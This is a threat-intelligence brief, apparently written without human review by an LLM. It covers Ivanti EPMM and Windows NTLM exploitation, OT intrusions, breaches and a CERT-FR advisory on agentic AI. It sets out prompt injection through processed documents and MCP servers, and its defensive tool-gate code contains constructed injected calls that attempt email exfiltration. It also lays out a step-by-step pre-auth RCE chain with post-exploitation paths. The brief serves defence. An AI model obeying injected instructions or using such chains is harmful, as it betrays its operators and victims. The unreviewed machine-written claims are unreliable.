AI-generated content — no human review. This brief was produced autonomously by an LLM (Claude Sonnet 4.6, model ID `claude-sonnet-4-6`) executing the prompt at `prompts/daily-cti-brief.md` as a Claude Code routine on Anthropic-managed cloud infrastructure. Nothing here is reviewed or edited by a human before publication. All facts are linked inline to the public sources the agent fetched in this run. Verify any operationally critical claim against the linked primary source before acting.
§ 1 — TL;DR
Five items demand immediate attention today:
- Ivanti EPMM on-premises MDM — active exploitation of a pre-auth cert-impersonation → admin RCE chain (CVE-2026-5787 / CVE-2026-6973); CISA KEV deadline 2026-05-10 (two days). Approximately 508 EU on-premises instances are internet-reachable. Update to fixed versions immediately or isolate the admin interface from the internet. Full technical breakdown in § 7.
- Windows Shell spoofing / NTLM capture (CVE-2026-32202) — APT28 actively exploiting against EU government ministries; CISA KEV deadline 2026-05-12. Apply April 2026 Patch Tuesday and block outbound SMB to internet.
- PAN-OS CVE-2026-0300 CISA KEV deadline is TODAY (2026-05-09). No patch until 2026-05-13. Mitigation (disable Captive Portal / restrict to internal) must be confirmed applied.
- Pro-Russian hacktivists compromised OT networks of five Polish water treatment facilities, modifying pump settings. Manual overrides prevented service disruption. Pattern consistent with Cyber Army of Russia Reborn / NoName057(16) campaigns in CEE infrastructure.
- Eurail began notifying 308 777 travellers three months after a December 2025 breach that exposed passport numbers, IBANs, and DiscoverEU pass data. Dutch DPA and EDPS have opened reviews of the delayed notification.
§ 2 — Immediate Actions
CVE-2026-5787 / CVE-2026-6973 — Ivanti EPMM pre-auth certificate impersonation → admin RCE (CISA KEV deadline **2026-05-10**)
Ivanti disclosed two vulnerabilities in Endpoint Manager Mobile (EPMM) on-premises that chain into a fully pre-authenticated remote code execution path against the MDM server. CVE-2026-5787 (CVSS 9.1, CWE-295) is an improper certificate validation flaw: an unauthenticated attacker who can reach the EPMM administrative network interface sends a crafted Sentry host registration request. EPMM fails to verify that the connecting host is an already-registered Sentry gateway and issues the attacker valid CA-signed client certificates with Sentry-level trust. Those certificates satisfy the authentication gate for CVE-2026-6973 (CVSS 7.2, CWE-20), where improper input validation in an administrative API endpoint allows the now-"authenticated" actor to execute arbitrary OS commands at the EPMM service account's privilege level. The nominal "admin required" label on CVE-2026-6973 is therefore misleading — in practice the chain requires no prior credentials.
CISA added CVE-2026-6973 to the Known Exploited Vulnerabilities catalog (deadline 2026-05-10) on the same day Ivanti disclosed the vulnerabilities (2026-05-07). Ivanti reported "very limited exploitation in the wild" at disclosure; CISA's simultaneous KEV listing confirms verified exploitation. Only on-premises EPMM is affected; Ivanti Neurons for MDM (cloud), EPM, Sentry as a standalone product, and EPMM mobile clients are unaffected. An estimated 508 EPMM on-premises instances in the EU are internet-reachable (Censys/Shodan telemetry), concentrated in public-sector and healthcare verticals — both NIS2 Annex-I essential entities.
Fixed versions: 12.6.1.1 (12.6.x branch), 12.7.0.1 (12.7.x branch), 12.8.0.1 (12.8.x branch).
Immediate actions if patching within 24 hours is not feasible: Remove EPMM port 443 from internet exposure; place admin interface behind VPN with allowlisted management IPs; disable internet-facing Sentry registration endpoints; audit EPMM logs for unexpected Sentry host_id registration events.
CVE-2026-32202 — Windows Shell NTLM coercion / credential capture, APT28 active against EU governments (CISA KEV deadline **2026-05-12**)
A protection mechanism failure (CWE-693) in Windows Shell allows an unauthenticated, network-adjacent attacker to coerce outbound NTLM authentication from a target system after minimal user interaction with a crafted artefact (LNK file or similar Shell shortcut). When a user opens a directory containing the malicious artefact, the Shell resolves it and initiates an SMB connection to an attacker-controlled server, transmitting a NetNTLM credential hash. The attacker relays the hash for same-network lateral movement or cracks it offline to recover plaintext credentials. NVD CVSS is 4.3 (network vector, no privileges required, user interaction required), reflecting the coercion-only impact; in-the-wild exploitation and state-actor attribution make the operational risk materially higher.
Microsoft patched this in the April 2026 Patch Tuesday cycle. CISA added CVE-2026-32202 to KEV on 2026-04-28 with a deadline of 2026-05-12. Threat intelligence attributes active exploitation to APT28 (GRU Unit 26165, "Fancy Bear") targeting EU government ministries. The technique complements APT28's documented use of NTLM relay and pass-the-hash for lateral movement within government networks.
Immediate actions: Apply April 2026 Windows Patch Tuesday; block outbound TCP 445 to non-business internet destinations at the perimeter firewall; enable "Restrict NTLM" Group Policy (set to "Deny all") or migrate authentication to Kerberos-only where operationally feasible; monitor EDR for outbound 445/TCP to internet IPs from workstations.
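The last of those actions (watching for outbound 445/TCP from workstations to internet addresses) is straightforward to script over firewall logs. The following is an added example, not code from the brief or from any vendor: the key=value log format and the sample lines are constructed for illustration, and the internal ranges are listed explicitly so that documentation addresses count as external.

```python
"""Flag outbound SMB (TCP 445) from workstation subnets to non-internal
destinations, the hunt suggested for NTLM coercion. Added example: the
key=value log format and sample lines are constructed and do not match any
vendor's real log schema."""
import ipaddress
import re
from dataclasses import dataclass

# RFC 1918 plus loopback; listed explicitly rather than relying on
# ipaddress.is_private so that documentation ranges count as external.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

# Constructed sample firewall lines (hypothetical format).
SAMPLE_LOG = """\
2026-05-08T09:12:01Z action=allow src=10.20.5.41 dst=10.20.1.10 dport=445 proto=tcp
2026-05-08T09:12:07Z action=allow src=10.20.5.41 dst=203.0.113.77 dport=445 proto=tcp
2026-05-08T09:13:15Z action=allow src=10.20.5.88 dst=198.51.100.9 dport=443 proto=tcp
2026-05-08T09:14:02Z action=deny src=10.20.5.41 dst=203.0.113.77 dport=445 proto=tcp
2026-05-08T09:15:30Z action=allow src=10.20.7.12 dst=192.0.2.200 dport=445 proto=tcp
2026-05-08T09:16:44Z action=allow src=10.30.0.5 dst=192.0.2.200 dport=445 proto=tcp
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) action=(?P<action>\w+) src=(?P<src>\S+) dst=(?P<dst>\S+) "
    r"dport=(?P<dport>\d+) proto=(?P<proto>\w+)$"
)


@dataclass(frozen=True)
class Finding:
    timestamp: str
    src: str
    dst: str
    action: str


def is_internal(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in INTERNAL_NETS)


def find_outbound_smb(log_text, workstation_nets, include_denied=False):
    """Return Finding objects for TCP/445 flows from workstation subnets to
    external destinations. Denied flows are skipped unless include_denied is
    set (a blocked attempt still indicates a coerced host worth triaging)."""
    nets = [ipaddress.ip_network(n) for n in workstation_nets]
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m or m["proto"] != "tcp" or int(m["dport"]) != 445:
            continue
        src = ipaddress.ip_address(m["src"])
        if not any(src in n for n in nets) or is_internal(m["dst"]):
            continue
        if m["action"] != "allow" and not include_denied:
            continue
        findings.append(Finding(m["ts"], m["src"], m["dst"], m["action"]))
    return findings


def hosts_by_external_target(findings):
    """Count distinct workstations per external SMB destination; several hosts
    reaching the same external 445 endpoint points at a shared lure."""
    per_dst = {}
    for f in findings:
        per_dst.setdefault(f.dst, set()).add(f.src)
    return {dst: len(srcs) for dst, srcs in per_dst.items()}


if __name__ == "__main__":
    hits = find_outbound_smb(SAMPLE_LOG, ["10.20.0.0/16", "10.30.0.0/16"])
    for h in hits:
        print(h)
    print(hosts_by_external_target(hits))
```

Run it against exported firewall logs with your own workstation subnets; a destination reached by more than one internal host is the first thing to pivot on, since a single shared lure (a planted shortcut in a shared directory) produces exactly that pattern.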
§ 3 — Active Threats & Campaigns
Pro-Russian hacktivists modify OT pump settings at five Polish water treatment facilities
Poland's Internal Security Agency (ABW) disclosed that pro-Russian hacktivist actors penetrated the operational technology (OT) networks of five water treatment facilities and modified pump control parameters. At least one facility activated manual override procedures to prevent potential service disruption; no compromise of drinking water quality or supply loss was confirmed. ABW attributed the activity to actors operating in support of Russian geopolitical objectives but stopped short of formal state attribution. The attack pattern — IT/OT flat network exploitation leading to HMI manipulation — is consistent with prior campaigns attributed to NoName057(16) and Cyber Army of Russia Reborn in Central and Eastern European infrastructure. Polish water sector authorities and critical-infrastructure operators have been placed on heightened alert. The ABW advisory is a single-source national CERT/authority disclosure.
MuddyWater (Iran/MOIS) deploys Chaos ransomware as false flag; harvests credentials via Teams
Security researchers documented a refreshed campaign by MuddyWater (attributed to Iran's Ministry of Intelligence and Security, MOIS), targeting government contractors and defence-adjacent organisations in Europe and the Middle East. The campaign deploys Chaos ransomware payloads with branding designed to mimic criminal ransomware groups — a deliberate false-flag technique intended to complicate attribution and delay incident response triage. A parallel social-engineering vector uses Microsoft Teams external-access invitations to gain remote-assistance sessions under a helpdesk pretext, after which credentials are harvested and used for further access via legitimate cloud services. Observed ATT&CK techniques: T1566.004 (Spearphishing via Teams), T1649 (Steal or Forge Authentication Certificates), T1486 (Data Encrypted for Impact). This is a single-source threat-intelligence vendor disclosure.
Qilin ransomware hits Die Linke (Germany): 1.5 TB claimed, DPA notified (~April 2026, first coverage)
The German federal party Die Linke confirmed in April 2026 that the Qilin ransomware group (also known as Agenda, a Rust-based RaaS platform known for double extortion) encrypted its systems and exfiltrated data, with the gang claiming 1.5 TB of internal data. The party's data protection officer notified the responsible Landesdatenschutzbehörde (state DPA). Die Linke issued a victim statement acknowledging operational disruption; no ransom figure has been publicly disclosed. Qilin has targeted political parties and civil-society organisations across Western Europe since 2023. This breach is approximately four weeks old but has not been previously covered in this brief series.
Eurail breach: 308 777 travellers notified three months after December 2025 compromise; Dutch DPA and EDPS open reviews
Eurail began issuing breach notifications to 308 777 customers in late April 2026, revealing that an attacker accessed personal data — including passport numbers, IBANs, and DiscoverEU pass details — in a December 2025 incident. The three-month gap between discovery and notification is under review by the Autoriteit Persoonsgegevens (Dutch DPA) and the European Data Protection Supervisor (EDPS), which holds jurisdiction over EU institutional data processing. GDPR Article 33 requires supervisory authority notification within 72 hours of awareness of a breach. The exposed dataset covers travellers from EU member states who registered DiscoverEU passes; Swiss nationals who applied through bilateral arrangement may also be affected. Affected individuals should monitor for identity fraud and, where banking regulations permit, consider IBAN replacement.
CERT-FR CERTFR-2026-ACT-016: Agentic AI tools introduce prompt-injection and supply-chain attack surfaces
France's CERT-FR published advisory CERTFR-2026-ACT-016 warning that deploying agentic AI orchestration platforms (LLM-driven workflows with tool-calling, MCP server integration, or autonomous execution capabilities) introduces novel attack vectors. The advisory identifies three risk classes: prompt-injection via processed documents or websites (attacker embeds instructions in content the agent processes, redirecting its actions); MCP server supply-chain compromise (a malicious or compromised Model Context Protocol server can issue instructions to all connected agents); and insufficient sandboxing of agent execution environments, where agents with filesystem or network access can be weaponised. CERT-FR recommends input/output guardrails, strict allowlisting of permitted tool calls, human-in-the-loop gates for high-impact actions, and treating all AI agent outputs as untrusted until validated. Relevant for organisations deploying Claude Agents, Microsoft Copilot Studio, AutoGen, or similar agentic frameworks for workflow automation.
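Two of the CERT-FR recommendations (strict allowlisting of tool calls and a human-in-the-loop gate for high-impact actions) can be expressed as a small policy layer between the model and the tools it may invoke. The block below is an added example, not CERT-FR's or any framework's code: the tool names, the call format, the approval rule and the sample plan are hypothetical, and the last two calls in the plan stand in for instructions injected through a processed document.

```python
"""Deny-by-default policy gate in front of an LLM agent's tool calls:
an allowlist of permitted tools, a human-in-the-loop gate for high-impact
actions, and a per-tool call budget. Added example; tool names, call format
and the approval rule are hypothetical."""
from dataclasses import dataclass
from typing import Callable, Dict, List, Set, Tuple


@dataclass
class ToolPolicy:
    allowed: Set[str]                 # everything else is denied
    needs_approval: Set[str]          # high-impact: a human decides
    max_calls_per_tool: int = 3       # bounds looping or runaway agents


@dataclass(frozen=True)
class Decision:
    tool: str
    outcome: str                      # allow | deny | approved | rejected
    reason: str


class ToolGate:
    def __init__(self, policy: ToolPolicy, approver: Callable[[str, dict], bool]):
        self.policy = policy
        self.approver = approver      # stands in for a human review step
        self.counts: Dict[str, int] = {}

    def check(self, tool: str, args: dict) -> Decision:
        if tool not in self.policy.allowed:
            return Decision(tool, "deny", "tool not on allowlist")
        self.counts[tool] = self.counts.get(tool, 0) + 1
        if self.counts[tool] > self.policy.max_calls_per_tool:
            return Decision(tool, "deny", "per-tool call budget exceeded")
        if tool in self.policy.needs_approval:
            ok = self.approver(tool, args)
            return Decision(tool, "approved" if ok else "rejected", "human-in-the-loop gate")
        return Decision(tool, "allow", "allowlisted, low impact")


def run_plan(calls: List[Tuple[str, dict]], gate: ToolGate) -> List[Decision]:
    """Evaluate a sequence of proposed tool calls. The agent's proposed plan is
    untrusted input: nothing executes unless the gate says so."""
    return [gate.check(tool, args) for tool, args in calls]


def internal_recipients_only(tool: str, args: dict) -> bool:
    """Hypothetical reviewer rule: approve outbound mail only to the org domain."""
    if tool == "send_email":
        return all(a.endswith("@example.net") for a in args.get("to", []))
    return False


# Constructed plan: the last two calls imitate instructions injected via a
# processed document (a tool the agent was never granted, then exfil by mail).
SAMPLE_PLAN = [
    ("read_file", {"path": "inbox/invoice-4471.pdf"}),
    ("summarise", {"max_words": 120}),
    ("send_email", {"to": ["ap-team@example.net"], "subject": "Invoice summary"}),
    ("run_shell", {"cmd": "constructed-injected-command"}),
    ("send_email", {"to": ["collect@attacker.example"], "subject": "fwd"}),
]

POLICY = ToolPolicy(allowed={"read_file", "summarise", "send_email"},
                    needs_approval={"send_email"})

if __name__ == "__main__":
    for d in run_plan(SAMPLE_PLAN, ToolGate(POLICY, internal_recipients_only)):
        print(f"{d.tool:12} {d.outcome:9} {d.reason}")
```

The design point is that the gate sees the concrete arguments, not the model's reasoning: an injected instruction that names an ungranted tool is rejected by the allowlist before any reviewer is involved, and one that abuses a granted tool is stopped by the argument-level approval rule.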
§ 4 — Trending Vulnerabilities
CVE-2026-5787 — Ivanti EPMM improper certificate validation (pre-auth Sentry impersonation, CVSS 9.1)
EPMM's internal PKI issues CA-signed certificates to registered Sentry gateway hosts upon verified registration. CVE-2026-5787 (CWE-295) is a failure in that verification: an attacker submits a crafted registration request and EPMM issues a valid CA-signed certificate without confirming prior registration. The certificate carries Sentry-level trust and satisfies EPMM's administrative authentication gate, enabling the CVE-2026-6973 chain. No workaround fully mitigates CVE-2026-5787 in isolation; patching is required. Affected: all on-prem EPMM < 12.6.1.1 / 12.7.0.1 / 12.8.0.1.
CVE-2026-6973 — Ivanti EPMM admin API improper input validation → RCE (CVSS 7.2, CISA KEV deadline 2026-05-10)
An authenticated administrative user can pass crafted input to an EPMM REST API endpoint, triggering OS-level code execution at the service account privilege level (CWE-20). Standalone, this requires admin credentials; chained after CVE-2026-5787 it is fully pre-auth. CISA KEV deadline: 2026-05-10. EU internet-exposed on-prem instances: approx. 508 (Censys/Shodan). Fixed in 12.6.1.1, 12.7.0.1, 12.8.0.1. See § 7 for detailed chain mechanics.
CVE-2026-32202 — Windows Shell NTLM coercion, APT28 ITW (CVSS 4.3, CISA KEV deadline 2026-05-12)
A crafted Windows Shell artefact (LNK shortcut) placed in a directory causes the victim host to initiate an outbound SMB authentication to an attacker-controlled server when the directory is opened, transmitting NetNTLM hashes. APT28 has weaponised this against EU government ministries. Despite the low NVD CVSS (4.3), KEV listing and state-actor ITW exploitation make this a priority-patch item. Apply April 2026 Windows cumulative updates. CISA KEV deadline: 2026-05-12.
GLPI CERTFR-2026-AVI-0551 — Seven CVEs including SSRF and XSS in EU ITSM platform (advisory 2026-04-29)
France's CERT-FR published CERTFR-2026-AVI-0551 (April 29, 2026) covering seven CVEs in GLPI, the open-source IT Service Management platform widely deployed in European public-sector organisations and healthcare networks. Vulnerability types include SSRF (CVE-2026-32312), stored and reflected XSS (CVE-2026-42317, CVE-2026-42318, CVE-2026-42320, CVE-2026-42321), security policy bypass (CVE-2026-5385), and data integrity compromise (CVE-2026-40108). CVSS scores are not published in the advisory. No exploitation in the wild is confirmed. GLPI administrators should upgrade to version ≥ 10.0.25 (10.0.x branch) or ≥ 11.0.7 (11.x branch). Swiss federal and cantonal administrations and hospitals using GLPI as their ITSM are advised to schedule patching within the standard change window.
§ 5 — Research & Reports
Dragos 2025 OT Cybersecurity Year in Review: 81% of IR engagements found flat IT/OT network architecture
Dragos released its 2025 OT Cybersecurity Year in Review — Frontlines IR Edition synthesising findings from industrial incident response engagements. Key statistics: 81% of engagements identified no meaningful IT/OT network segmentation, with operational networks reachable directly from enterprise IT; initial access via internet-exposed remote access tools (internet-facing HMI, unprotected VPN termination, or engineering workstation RDP) was the dominant entry vector in 62% of cases; and 34% of confirmed OT intrusions progressed to the operational process level before detection. The report documents NIS2 Annex-I compliance gaps, noting that many essential OT-operating entities have not completed required asset inventory reviews, which the report identifies as the most common control weakness. The IEC 62443 zoning and conduit model is highlighted as the primary reference architecture for remediation. Relevant to Swiss organisations operating under NCSC sector-specific ICS guidance (SARI framework).
Kaspersky Q1 2026 Exploits and Vulnerabilities Report: document-based exploits resurge; RaaS acquires zero-days
Kaspersky's quarterly exploitation analysis for Q1 2026 identifies a marked resurgence in document-based exploit delivery, with Microsoft Office and PDF readers accounting for the largest share of initial-access exploit deployments. The most exploited CVE class involved Office Protected View bypass chains (multiple CVEs published in January 2026 Patch Tuesday). Browser exploitation via V8 memory corruption grew 34% quarter-on-quarter. A significant structural trend: ransomware-as-a-service operators are increasingly acquiring zero-day exploits directly from private brokers rather than relying on publicly available PoC code, shortening the detection window between disclosure and mass exploitation. The report includes Excel macro delivery via cloud storage abuse as an emerging initial-access technique.
Amazon SES weaponised for authenticated phishing and BEC (Kaspersky, 2026-05-04, ~96 h)
Kaspersky researchers documented a campaign technique using legitimate Amazon Simple Email Service (SES) accounts to deliver attacker-crafted phishing and business-email-compromise (BEC) lures. Because messages originate from genuine SES infrastructure, SPF and DKIM authentication passes and messages evade most email security gateway filters based on sender reputation. Attackers obtain SES API credentials from publicly exposed AWS configuration files (S3 bucket misconfigurations, leaked GitHub repositories). Observed campaign goals include invoice-fraud lures targeting finance departments and credential phishing pages hosted on AWS infrastructure. Kaspersky observed targeting of finance departments at European manufacturing firms. This report is approximately 96 hours old at publication; first coverage in this brief series.
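Since SPF and DKIM legitimately pass for mail relayed through SES, the useful gateway check is alignment: does the domain that authenticated match the visible From domain? The following is an added example, not Kaspersky's or Amazon's code. Both messages are constructed, the Authentication-Results parsing is a simplified reading of the RFC 8601 header, and the organisational-domain comparison uses the last two labels rather than the Public Suffix List.

```python
"""DMARC-style alignment check for mail that passes SPF/DKIM via a shared
sending service such as Amazon SES. Added example with constructed messages;
organisational-domain matching is approximated by the last two labels."""
import re
from dataclasses import dataclass
from email import message_from_string
from email.utils import parseaddr

SES_SUFFIX = "amazonses.com"

# Constructed lure: SES signs with its own DKIM domain, From is a look-alike.
SUSPICIOUS_MSG = """\
Return-Path: <0100bounce-constructed@amazonses.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=0100bounce-constructed@amazonses.com; dkim=pass header.d=amazonses.com
DKIM-Signature: v=1; a=rsa-sha256; d=amazonses.com; s=constructed; h=from:subject; bh=constructed; b=constructed
From: Accounts Payable <ap@contoso-invoices-pay.example>
To: finance@example.net
Subject: Overdue invoice 4471 - payment details updated

Please find the revised bank details attached.
"""

# Constructed legitimate message: the partner configured custom DKIM, so the
# signing domain aligns with From even though the envelope is SES.
LEGIT_MSG = """\
Return-Path: <0100bounce-constructed@amazonses.com>
Authentication-Results: mx.example.net; spf=pass smtp.mailfrom=0100bounce-constructed@amazonses.com; dkim=pass header.d=mail.partner.example
DKIM-Signature: v=1; a=rsa-sha256; d=mail.partner.example; s=constructed; h=from:subject; bh=constructed; b=constructed
From: Partner Billing <billing@partner.example>
To: finance@example.net
Subject: Statement for April

Your April statement is ready.
"""


def org_domain(domain: str) -> str:
    # Simplification: last two labels (real DMARC uses the Public Suffix List).
    parts = domain.lower().strip(".").split(".")
    return ".".join(parts[-2:]) if len(parts) >= 2 else domain.lower()


def _domain_of(addr_or_domain: str) -> str:
    return addr_or_domain.rpartition("@")[2].lower()


@dataclass(frozen=True)
class Verdict:
    from_domain: str
    dkim_domain: str
    spf_domain: str
    dkim_aligned: bool
    spf_aligned: bool
    via_ses: bool
    flagged: bool


def assess(raw: str, known_ses_senders=frozenset()) -> Verdict:
    """Flag SES-relayed mail whose authenticated domains do not align with the
    From domain, unless the From domain is a known SES-using partner."""
    msg = message_from_string(raw)
    from_domain = _domain_of(parseaddr(msg.get("From", ""))[1])
    rp_domain = _domain_of(parseaddr(msg.get("Return-Path", ""))[1])
    auth = " ".join(" ".join(msg.get_all("Authentication-Results", [])).split())
    dkim = re.search(r"dkim=pass\s+header\.d=([^;\s]+)", auth)
    spf = re.search(r"spf=pass\s+smtp\.mailfrom=([^;\s]+)", auth)
    dkim_domain = _domain_of(dkim.group(1)) if dkim else ""
    spf_domain = _domain_of(spf.group(1)) if spf else ""
    dkim_aligned = bool(dkim_domain) and org_domain(dkim_domain) == org_domain(from_domain)
    spf_aligned = bool(spf_domain) and org_domain(spf_domain) == org_domain(from_domain)
    via_ses = any(d.endswith(SES_SUFFIX) for d in (dkim_domain, spf_domain, rp_domain) if d)
    flagged = via_ses and not (dkim_aligned or spf_aligned) and from_domain not in known_ses_senders
    return Verdict(from_domain, dkim_domain, spf_domain, dkim_aligned, spf_aligned, via_ses, flagged)


if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS_MSG), ("legit", LEGIT_MSG)):
        print(name, assess(raw))
```

This mirrors what DMARC enforcement on the From domain would do if the look-alike domain published a policy, which it will not; running the alignment test at the gateway for service-relayed mail closes that gap without blocking partners who set up custom DKIM.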
§ 6 — Updates on Previously Covered Items
UPDATE — CVE-2026-0300 (PAN-OS Captive Portal unauthenticated root RCE): CISA KEV deadline is **today (2026-05-09)**; no patch until 2026-05-13
(First covered and deep-dived 2026-05-07.) The CISA KEV federal remediation deadline for CVE-2026-0300 is 2026-05-09 — today. Palo Alto Networks has not released a permanent patch for any PAN-OS branch; the earliest patch ETA is 2026-05-13. The mandated mitigation remains: disable the Captive Portal / Authentication Portal feature on internet-facing GlobalProtect gateway interfaces, or restrict access exclusively to trusted internal management IP ranges. PAN-OS 11.1+ deployments should confirm Threat Prevention profile with Threat ID 510019 is active on the internet-facing zone. Organisations that have not yet applied the mitigation should treat this as a P0 action today before business opens.
UPDATE — Instructure/Canvas extortion: 330 institutions across six countries; May 12 extortion deadline; 44 Dutch institutions confirmed
(First covered 2026-05-06.) The Instructure/Canvas breach has expanded significantly in scope. The threat actor now claims access affecting 330 institutions across six countries, threatening to publish 16 million student and staff records. SURF (the Dutch National Research and Education Network) has confirmed 44 Dutch institutions among the victims. The attacker posted portal defacements at multiple universities and established a 2026-05-12 extortion deadline for ransom payment. Canvas services were taken offline again on 2026-05-07 for emergency patching. European DPAs in the Netherlands and Germany have opened preliminary inquiries into notification timing. Institutions using Canvas should assess GDPR Article 33/34 breach notification obligations before the May 12 deadline.
§ 7 — Deep Dive: Ivanti EPMM CVE-2026-5787 → CVE-2026-6973 — Pre-Auth Certificate Impersonation Chaining to RCE in Enterprise Mobile Device Management
Background and target value. Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, is one of the two dominant on-premises MDM platforms in European enterprise and public-sector environments. MDM servers are exceptionally high-value targets: they hold device enrolment certificates, configuration profiles, SCEP/NDES CA material, application distribution packages, and — in most architectures — are authorised to silently push policy updates, configurations, or wipe enrolled devices fleet-wide. A compromised EPMM server gives an attacker persistent, trusted command over every enrolled mobile device in the organisation, representing a direct path to the complete endpoint fleet. European governments and healthcare systems are among the heaviest EPMM on-premises adopters, making the EU concentration of exposed instances (est. 508) particularly significant.
CVE-2026-5787: Certificate validation failure in Sentry host registration (CVSS 9.1, CWE-295)
EPMM's architecture includes a component called Sentry — a protocol-translating reverse proxy that mediates traffic between enrolled mobile devices and corporate backend services (Exchange ActiveSync, SharePoint, etc.). The EPMM server and its registered Sentry gateways maintain mutual trust via an internal PKI: when a Sentry host onboards, EPMM verifies its identity and issues it a CA-signed certificate that subsequent API calls present for authentication.
CVE-2026-5787 is a failure in the certificate issuance verification step. The EPMM server does not adequately validate that a host requesting Sentry registration is genuinely in the pre-approved registration queue before issuing a signed certificate. An unauthenticated attacker who can reach the EPMM administrative endpoint (TCP 443) submits a crafted Sentry registration request. EPMM accepts it as legitimate and issues the attacker a valid CA-signed client certificate carrying Sentry-level trust. That certificate is the key to the second vulnerability.
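The class of defect described here (issuing a trusted credential without confirming the requester was pre-approved) is easiest to see in a toy model. The block below is an added illustration, not Ivanti code: the `Registry` structure, the function names and the one-time registration token are hypothetical, and EPMM's real issuance path is not publicly documented. It places the unchecked issuance beside a version that consults the pre-approval queue and audits rejections.

```python
"""Toy model of a certificate-issuance step that never checks whether the
requesting host was pre-approved, beside a hardened version. Added
illustration; data structures, names and the token scheme are hypothetical."""
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Optional

CA_KEY = secrets.token_bytes(32)  # stands in for the internal CA signing key


@dataclass
class Registry:
    pending: dict = field(default_factory=dict)   # host_id -> one-time token
    issued: dict = field(default_factory=dict)    # host_id -> toy certificate
    audit: list = field(default_factory=list)     # (event, host_id, src_ip)

    def preapprove(self, host_id: str) -> str:
        """Admin step: queue a host and hand it a token out of band
        (hypothetical mechanism)."""
        token = secrets.token_hex(16)
        self.pending[host_id] = token
        return token


def _sign(host_id: str) -> str:
    # Toy "certificate": an HMAC over the subject, standing in for a CA signature.
    return hmac.new(CA_KEY, host_id.encode(), hashlib.sha256).hexdigest()


def issue_vulnerable(reg: Registry, host_id: str, src_ip: str) -> str:
    """Issues gateway-trust credentials to any requester: the pending queue is
    never consulted, so an unknown host receives a valid certificate."""
    cert = _sign(host_id)
    reg.issued[host_id] = cert
    reg.audit.append(("SENTRY_CERT_ISSUED", host_id, src_ip))
    return cert


def issue_hardened(reg: Registry, host_id: str, token: Optional[str],
                   src_ip: str) -> Optional[str]:
    """Issues only to a pre-approved host presenting the matching one-time
    token; rejections are audited so unexpected registrations are visible."""
    expected = reg.pending.get(host_id)
    if expected is None or token is None or not hmac.compare_digest(expected, token):
        reg.audit.append(("SENTRY_REGISTRATION_REJECTED", host_id, src_ip))
        return None
    del reg.pending[host_id]          # single use: a replay is rejected
    cert = _sign(host_id)
    reg.issued[host_id] = cert
    reg.audit.append(("SENTRY_CERT_ISSUED", host_id, src_ip))
    return cert


def verify(cert: str, host_id: str) -> bool:
    """What a downstream API gate checks: is this a CA-signed credential for host_id?"""
    return hmac.compare_digest(cert, _sign(host_id))


if __name__ == "__main__":
    weak = Registry()
    print("vulnerable path accepts unknown host:",
          verify(issue_vulnerable(weak, "unknown-host", "203.0.113.9"), "unknown-host"))
    strong = Registry()
    print("hardened path, no pre-approval:",
          issue_hardened(strong, "unknown-host", None, "203.0.113.9"))
    tok = strong.preapprove("sentry-01")
    print("hardened path, approved host:",
          issue_hardened(strong, "sentry-01", tok, "10.50.0.11") is not None)
    print(strong.audit)
```

The point the model makes is the one in the text: once the issuance step trusts the requester, every downstream check that relies on the certificate (here `verify`) passes, so the "authenticated" label on the second bug provides no protection. The audit entries in the hardened path are also what a detection rule for unexpected registrations would key on.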
CVE-2026-6973: Admin API improper input validation → OS command execution (CVSS 7.2, CWE-20)
EPMM exposes a REST API for administrative operations. One or more endpoints in the affected version range accept parameters that are passed to a server-side execution context (OS command constructor, file path handler, or template engine — the exact sink is not publicly disclosed by Ivanti) without adequate sanitisation. An actor authenticated as an administrator can supply a crafted parameter value that causes the server to execute attacker-controlled OS commands at the privilege level of the EPMM service account (typically root or a high-privilege service identity on the underlying Linux host).
Chain mechanics (step-by-step)
1. Attacker identifies internet-facing EPMM port 443 (admin/MDM API)
2. Sends crafted Sentry registration request → CVE-2026-5787
3. EPMM issues valid CA-signed client certificate (Sentry trust level)
4. Attacker presents certificate to EPMM admin REST API → authenticated as admin
5. Injects OS command payload into vulnerable admin API parameter → CVE-2026-6973
6. Arbitrary OS command execution on EPMM host as service account
Post-exploitation paths:
├── Extract SCEP/NDES CA private key material from EPMM keystore
├── Enrol attacker-controlled device to gain persistent MDM trust
├── Push malicious MDM profile / app to enrolled device fleet
└── Pivot to backend services via Sentry certificate trust
The combined chain converts a nominal "requires admin authentication" RCE into a fully pre-authenticated exploit — the reason CISA listed the vulnerability in KEV with a two-day remediation deadline despite the individual CVE scores.
Exploitation context and historical precedent
At disclosure (2026-05-07), Ivanti reported "very limited exploitation" of CVE-2026-6973. CISA's simultaneous KEV listing confirms verified in-the-wild exploitation. Historical precedent for Ivanti EPMM is instructive: CVE-2023-35078 (pre-auth API access, July 2023) was exploited by APT29 and LAPSUS-adjacent actors within days of disclosure, targeting European government MDM servers. CVE-2025-0283 (January 2025) followed a similar pattern. The security community should treat "very limited" as reflecting disclosure-moment telemetry, not steady-state exploitation activity; public PoC availability will accelerate exploitation.
MITRE ATT&CK mapping
| Technique | ID | Application |
|---|---|---|
| Exploit Public-Facing Application | T1190 | Direct exploitation of internet-exposed EPMM |
| Valid Accounts | T1078 | CA-signed cert provides admin-equivalent session |
| Command and Scripting Interpreter | T1059 | OS command execution via unsanitised API input |
| Compromise Infrastructure: Certificate Authorities | T1584.007 | Post-exploit extraction of EPMM internal CA material |
| Remote Device Management | T1072 | MDM push to enrolled device fleet post-compromise |
| Steal Application Access Token | T1528 | Extraction of device enrolment certificates |
Detection opportunities
- EPMM audit log (`/var/log/mi*`): unexpected Sentry host registration events with unknown `host_id` values, or registration from IP addresses outside the known Sentry appliance inventory
- Syslog / process audit on the EPMM host: EPMM service account spawning unexpected child processes (`sh`, `bash`, `curl`, `wget`) or accessing non-standard file paths
- Network telemetry: outbound connections from the EPMM host to non-Ivanti, non-MDM-infrastructure IPs shortly after a certificate issuance event
- EDR on EPMM host (if deployed): process ancestry anomalies under the EPMM service account
- MDM enrolment audit: new device enrolment events from unrecognised device identifiers or IPs not in the corporate mobile device fleet
Immediate defensive steps (priority order)
